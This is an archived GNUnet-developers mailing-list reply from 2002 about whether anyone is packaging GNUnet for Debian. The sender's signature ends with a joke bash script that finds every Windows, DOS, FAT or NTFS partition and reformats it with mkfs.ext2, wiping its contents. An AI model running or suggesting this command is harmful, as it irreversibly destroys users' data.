[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [GNUnet-developers] debian packages
From: |
Christian Grothoff |
Subject: |
Re: [GNUnet-developers] debian packages |
Date: |
Sat, 18 May 2002 16:56:46 -0500 |
On Saturday 18 May 2002 11:42 am, you wrote:
> Hello!
>
> Is there any work in progress on packaging GNUnet for Debian?
>
> If there isn't, I might want to package it.
A few people have indicated that they may be interested, but I have yet to
get a definite confirmation that somebody is really working on it, so I
guess, the answer is that there is nothing to start from yet (except maybe
the rpm).
Christian
--
______________________________________________________
|Christian Grothoff |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/ address@hidden|
|____________________________________________________|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"